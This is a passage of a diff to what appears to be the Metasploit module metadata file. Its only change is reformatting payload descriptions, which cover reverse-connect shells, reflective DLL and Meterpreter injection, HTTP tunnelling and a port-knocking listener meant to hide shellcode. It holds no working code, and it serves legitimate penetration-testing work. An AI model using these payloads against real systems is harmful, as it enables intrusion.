    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197754,7 +198600,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197790,7 +198636,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -197825,7 +198671,7 @@
      "bwatters-r7",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -197861,7 +198707,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [

    ],
@@ -197897,7 +198743,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [

    ],
@@ -197934,7 +198780,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -197972,7 +198818,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198009,7 +198855,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198047,7 +198893,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198083,7 +198929,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198119,7 +198965,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection (No NX)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198156,7 +199002,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198195,7 +199041,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198232,7 +199078,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198268,7 +199114,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Use an established connection",
+    "description": "Inject a DLL via a reflective loader.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198306,7 +199152,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a DLL via a reflective loader. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198342,7 +199188,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198378,7 +199224,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198415,7 +199261,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker over IPv6",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198451,7 +199297,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker (No NX)",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198487,7 +199333,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198524,7 +199370,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198561,7 +199407,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a DLL via a reflective loader.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198599,7 +199445,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198638,7 +199484,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198677,7 +199523,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198714,7 +199560,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support",
+    "description": "Inject a DLL via a reflective loader.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -198751,7 +199597,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199002,7 +199848,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199041,7 +199887,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199079,7 +199925,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199117,7 +199963,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199155,7 +200001,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199193,7 +200039,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199231,7 +200077,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199271,7 +200117,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199309,7 +200155,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199346,7 +200192,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199386,7 +200232,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199424,7 +200270,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199462,7 +200308,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199500,7 +200346,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199540,7 +200386,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199578,7 +200424,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199615,7 +200461,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199653,7 +200499,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (No NX)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199691,7 +200537,7 @@
      "OJ Reeves",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199729,7 +200575,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199767,7 +200613,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199806,7 +200652,7 @@
      "hdm <x@hdm.io>",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199846,7 +200692,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199886,7 +200732,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199924,7 +200770,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199963,7 +200809,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -200002,7 +200848,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -200326,7 +201172,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -200364,7 +201210,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -200401,7 +201247,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -200439,7 +201285,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -200475,7 +201321,7 @@
      "skape <mmiller@hick.org>",
      "UserExistsError"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -200511,7 +201357,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection (No NX)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -200548,7 +201394,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -200587,7 +201433,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection",
    "references": [

    ],
@@ -200624,7 +201470,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -200659,7 +201505,7 @@
      "jt <jt@klake.org>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Use an established connection",
+    "description": "Inject a custom DLL into the exploited process.\n\nUse an established connection",
    "references": [

    ],
@@ -200696,7 +201542,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
